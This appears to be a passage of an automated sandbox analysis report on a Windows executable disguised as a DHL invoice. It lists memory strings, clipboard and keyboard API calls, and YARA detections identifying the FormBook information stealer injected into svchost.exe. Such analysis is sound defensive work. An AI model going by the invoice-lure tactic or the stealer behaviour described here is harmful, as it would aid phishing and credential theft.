Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK4J
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK4J-dark
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000004.00000002.2351312373.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1464190970.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: explorer.exe, 00000004.00000002.2351312373.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1464190970.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2401347592.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.000000000926A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000004.00000002.2351312373.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1464190970.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000004.00000000.1464190970.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000004.00000002.2351312373.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1464190970.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/black-slimy-matter-on-mint-leaves-toxic-chemicals-ne
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/who-is-andy-biggs-what-to-know-about-the-arizona-republican-
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0047EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0047EAFF

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0047ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_0047ED6A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0069ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_0069ED6A

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_0047EAFF

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0046AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0046AA57

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00499576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00499576
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006B9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_006B9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
